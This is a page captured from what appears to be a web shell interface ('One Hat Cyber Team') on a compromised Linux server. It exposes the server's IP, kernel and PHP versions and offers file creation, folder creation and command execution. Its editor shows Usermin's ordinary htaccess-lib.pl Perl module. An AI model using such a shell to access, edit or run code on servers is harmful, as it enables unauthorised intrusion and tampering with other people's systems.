⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.93
Server IP:
65.108.141.171
Server:
Linux server.heloix.com 5.4.0-214-generic #234-Ubuntu SMP Fri Mar 14 23:50:27 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
usermin
/
htaccess
/
Edit File: htaccess-lib.pl
# htaccess-lib.pl BEGIN { push(@INC, ".."); }; use WebminCore; &init_config(); do 'apache-lib.pl'; &switch_to_remote_user(); &create_user_config_dirs(); $www_root = $userconfig{'www_root'}; $www_root = "$remote_user_info[7]/$www_root" if ($www_root !~ /^\//); sub get_htaccess_files { local @rv; open(HTACCESS, "$user_module_config_directory/htlist"); while(<HTACCESS>) { s/\r|\n//g; push(@rv, $_) if (-r $_); } close(HTACCESS); return @rv; } sub set_htaccess_files { local $f; &open_tempfile(HTACCESS, ">$user_module_config_directory/htlist"); foreach $f (@_) { &print_tempfile(HTACCESS, $f,"\n"); } &close_tempfile(HTACCESS); } 1;
Simpan